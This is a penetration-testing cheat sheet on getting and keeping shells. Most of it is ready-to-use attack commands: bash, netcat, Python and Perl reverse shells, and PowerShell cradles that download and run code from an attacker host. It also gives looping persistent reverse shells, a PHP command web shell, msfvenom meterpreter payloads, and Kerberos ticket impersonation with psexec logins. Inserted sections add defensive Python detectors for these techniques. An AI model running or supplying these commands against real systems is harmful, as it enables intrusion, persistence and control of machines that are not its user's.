# Shell & Stabilization

## Reverse Shell

{% embed url="https://www.revshells.com/" %}

### Linux

```bash
# Bash
bash -c 'bash -i >& /dev/tcp/<ip>/443 0>&1'

# netcat
nc <ip> <port> -e /bin/bash
nc <ip> <port> -e cmd.exe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 443 >/tmp/f
```

PHP (with proc_open & proc_close, e.g. shell.phar):

```php
<?php
$descriptorspec = array(
    0 => array("pipe", "r"),  // child's stdin: the command is written here
    1 => array("pipe", "w"),  // child's stdout: read back below
    2 => array("file", "/tmp/error-output.txt", "a")  // child's stderr: appended to a file
);

$cwd = "/tmp";
$env = array("some_option" => "aeiou");
$process = proc_open("sh", $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    fwrite($pipes[0], "nc 127.0.0.1 9001");
    fclose($pipes[0]);
    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);

    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>
```

Python (injection into an input sink):

```python
__import__('os').system('whoami')
```

Python (python.py):

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```

Perl:

```bash
perl -e 'use Socket;$i="10.10.14.27";$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
```

### Windows

nc64.exe

{% embed url="https://github.com/vinsworldcom/NetCat64/releases" %}

```
nc64.exe -e cmd.exe <IP> 443
```

{% embed url="https://github.com/samratashok/nishang" %}

```powershell
# Execute file.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File shell.ps1

# Execute file remotely
IEX (New-Object System.Net.WebClient).DownloadString('http://<attacker ip>/shell.ps1')

# Invoke-PowerShellTcpOneLine.ps1
# Invoke-PowerShellTcp.ps1

# 1. setup python http server
# 2. execute
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://<ip attacker>/Invoke-PowerShellTcp.ps1')
# or
powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1

# encode payload (run on the attacker host; -enc expects base64 of UTF-16LE)
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0

powershell -enc <encoded payload>

# Execute command without crashing the previous shell
# 1. pwn.ps1
Invoke-WebRequest -Uri http://<attacker ip> -OutFile C:\Windows\Tasks\shell.exe;
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\shell.exe

# 2. execute this command
powershell -ep bypass -c "iex(iwr -uri <attacker ip>/pwn.ps1 -usebasicparsing)"

# note: you could change the payload in pwn.ps1 if your payload doesn't work.
```
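As an added defensive example (not part of this page or of the nishang/revshells projects): a small Python scanner that matches process command lines against the reverse-shell patterns listed in the Linux and Windows sections above, and decodes a `powershell -enc` argument (base64 of UTF-16LE, which is what the `iconv -t utf-16le | base64` step produces) so the download cradle hidden inside it is matched too. The sample command lines are constructed; 203.0.113.5 is a documentation address.

```python
import base64
import re

# Constructed sample process-creation command lines (not from any real host), modelled on
# the one-liners in the Linux and Windows sections above.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/Invoke-PowerShellTcp.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    "bash -c 'bash -i >& /dev/tcp/203.0.113.5/443 0>&1'",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 443 >/tmp/f",
    "python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "nc64.exe -e cmd.exe 203.0.113.5 443",
    "powershell -enc " + ENCODED,
    "ls -la /var/log",  # benign control line
]
# Each indicator corresponds to one technique shown on this page.
INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/[\w.-]+/\d+"),
    "netcat_exec": re.compile(r"\bnc(?:64)?(?:\.exe)?\b.*\s-e\s+(?:/bin/\w*sh|cmd\.exe)"),
    "mkfifo_pipe_shell": re.compile(r"mkfifo\s+\S+.*\|\s*nc\b"),
    "pty_spawn": re.compile(r"pty\.spawn\("),
    "ps_download_cradle": re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b.*(?:DownloadString|\biwr\b|Invoke-WebRequest)"),
}
# powershell -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_FLAG = re.compile(r"(?i)powershell(?:\.exe)?\b.*?\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -enc argument (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_cmdline(cmdline):
    """Match indicators against the command line and, if present, its decoded -enc payload."""
    decoded = decode_encoded_command(cmdline)
    haystacks = [cmdline] + ([decoded] if decoded else [])
    hits = sorted(name for name, rx in INDICATORS.items() if any(rx.search(h) for h in haystacks))
    if decoded:
        hits.append("powershell_encoded_command")
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits}

def scan_all(cmdlines):
    """Return only the scan results that fired at least one indicator."""
    return [r for r in map(scan_cmdline, cmdlines) if r["indicators"]]
```

The same decode step applies to any `-EncodedCommand` seen in process-creation telemetry, which is why it runs before the pattern match rather than after.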

## Shell Stabilization (Linux)

When? Whenever `tty` reports that the shell is not attached to a terminal:

```
$ tty
not a tty
```

Note:

> \[Ctrl + C] only works if the machine has bash as its default shell.
>
> Use "clear" instead.

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color=auto'
```

Keyboard shortcut: \[Ctrl + Z] (background the process).

```bash
stty raw -echo ; fg ; reset
stty columns 200 rows 200
```

## Persistence Reverse Shell

Important: run the persistence shell before executing anything else.

### Linux

```bash
# setsid variant: detaches from the current session, reconnects every 60 s
while :; do setsid bash -i &>/dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done &>/dev/null &

# nohup variant: survives the parent shell exiting
nohup bash -c "while :; do bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done" &
```

### Windows

Requires uploading **nc.exe** first.

```
start cmd /C "for /L %n in (1,0,10) do ( nc.exe <ATTACKER IP> <PORT> -e cmd.exe & ping -n 60 127.0.0.1 )"
```
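Added example, not from the page: the Linux and Windows loops above reconnect every 60 seconds (`sleep 60`, `ping -n 60`) once a session drops, which shows up in network telemetry as near-constant-interval connections from one host to one destination and port. This Python function flags that regularity in constructed connection records (the timestamps and addresses are made up).

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound-connection records (timestamp, src, dst, dport); not real telemetry.
# 10.0.0.7 reconnects to 203.0.113.5:443 about every 60 s, as the `sleep 60` loops above
# do once their shell drops; 10.0.0.9 is irregular, browsing-style traffic.
SAMPLE_CONNECTIONS = [
    ("2024-05-01T10:00:00", "10.0.0.7", "203.0.113.5", 443),
    ("2024-05-01T10:01:01", "10.0.0.7", "203.0.113.5", 443),
    ("2024-05-01T10:02:00", "10.0.0.7", "203.0.113.5", 443),
    ("2024-05-01T10:03:02", "10.0.0.7", "203.0.113.5", 443),
    ("2024-05-01T10:04:01", "10.0.0.7", "203.0.113.5", 443),
    ("2024-05-01T10:00:10", "10.0.0.9", "198.51.100.20", 443),
    ("2024-05-01T10:00:45", "10.0.0.9", "198.51.100.20", 443),
    ("2024-05-01T10:03:30", "10.0.0.9", "198.51.100.20", 443),
    ("2024-05-01T10:09:12", "10.0.0.9", "198.51.100.20", 443),
    ("2024-05-01T10:09:14", "10.0.0.9", "198.51.100.20", 443),
]

def find_beacons(connections, min_count=4, max_jitter=0.10):
    """Group by (src, dst, dport) and flag groups whose gaps between connections are
    nearly constant: coefficient of variation (stdev / mean) at or below max_jitter."""
    by_flow = defaultdict(list)
    for ts, src, dst, dport in connections:
        by_flow[(src, dst, dport)].append(datetime.fromisoformat(ts))
    beacons = []
    for (src, dst, dport), times in by_flow.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons.append({"src": src, "dst": dst, "dport": dport,
                            "count": len(times), "interval_s": round(avg, 1)})
    return beacons
```

A reverse shell that stays up shifts the interval by the session length, so pair this with the command-line indicators rather than relying on timing alone.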

## Web Shell

### PHP

* <https://github.com/ivan-sincek/php-reverse-shell> (works on Windows, Linux and macOS)
* <https://github.com/flozz/p0wny-shell>

Minimal command web shell, saved as `shell.php`:

```php
<?php
echo system($_REQUEST['cmd']);
?>
```

```
$URL/shell.php?cmd=id
```

Note: the simplest way to send commands is Burp Suite Repeater.

Change the GET request to a POST request for a better input experience.
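Added example (not from the page or the linked projects): a parser over constructed Apache access-log lines that flags the `shell.php?cmd=...` requests shown above, and separately flags a POST to a PHP file under an upload directory, because the GET-to-POST switch moves the command into the request body, which the access log does not record.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (not from a real server); the first three
# show the shell.php?cmd=... pattern above, the last is ordinary traffic.
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [01/May/2024:10:00:00 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 57 "-" "Mozilla/5.0"
203.0.113.9 - - [01/May/2024:10:00:05 +0000] "GET /uploads/shell.php?cmd=ls%20-la HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
203.0.113.9 - - [01/May/2024:10:00:20 +0000] "POST /uploads/shell.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.4 - - [01/May/2024:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SUSPICIOUS_PARAMS = {"cmd", "command", "exec"}  # parameter names typical of $_REQUEST['cmd'] shells

def analyse_access_log(text, upload_dirs=("/uploads/",)):
    """Flag requests to PHP files that carry a command parameter, plus POSTs to PHP files
    under writable upload paths (the request body, where a POSTed cmd lives, is not logged)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith(".php"):
            continue
        params = parse_qs(url.query)  # values are URL-decoded here (ls%20-la -> 'ls -la')
        reasons = [f"param {p}={params[p][0]!r}" for p in sorted(SUSPICIOUS_PARAMS & set(params))]
        if m["method"] == "POST" and url.path.startswith(upload_dirs):
            reasons.append("POST to PHP file under an upload directory (command would be in the unlogged body)")
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "path": url.path, "reasons": reasons})
    return findings
```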

### IIS

* IIS 8.5: <https://github.com/jivoi/pentest/blob/master/shell/insomnia_shell.aspx>

### ASPX run Shellcode

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=443 -f aspx
# or
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.1 LPORT=443 -f aspx
```

### Dig deeper

<https://github.com/tennc/webshell>

## Windows NT Authority shell from Administrator

```
psexec.exe -i -s cmd.exe
psexec.exe -i -s %SystemRoot%\system32\cmd.exe
```

## Shell to another user in Active Directory

Note: the following commands are PowerShell.

**Convert credentials**

```powershell
$pw = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential "<username>", $pw
```

**Command**

```powershell
Invoke-Command -ComputerName 127.0.0.1 -Credential $creds -ScriptBlock { whoami }
```

After logging in, run PowerView.

## Shell with silver ticket

If the domain user has **`constrained delegation privileges`**, you can use the `-impersonate` flag to request a ticket on behalf of another user.

For example:

```
# example env
Target IP: 10.10.10.1
Domain: test.local
Service: www
Host Name: server01.test.local
Username: john
Password: password123
Impersonated User: Administrator
```

**Request ticket**

```
# username and password (getST.py from Impacket, or the packaged impacket-getST wrapper)
python getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123

# NTLM hash (Impacket's -hashes takes LMHASH:NTHASH)
python3 getST.py -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes <lm hash>:<nt hash>
```

*Figure: result from request ticket*

**Save ticket to env**

```
export KRB5CCNAME=Administrator.ccache
```

**Login with ticket**

```
impacket-psexec -k -no-pass <domain>/Administrator@<domain controller>
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
```

## Login using Impacket (need local admin creds)

Requires valid credentials. If one command fails, try the next one.

```
# test with crackmapexec smb first
impacket-psexec <domain>/<username>@$IP
impacket-smbexec <domain>/<username>@$IP

# WMI port
impacket-wmiexec <domain>/<username>@$IP

# test with crackmapexec winrm first (WinRM, port 5985)
evil-winrm -i $IP -u <username> -p <password>
```

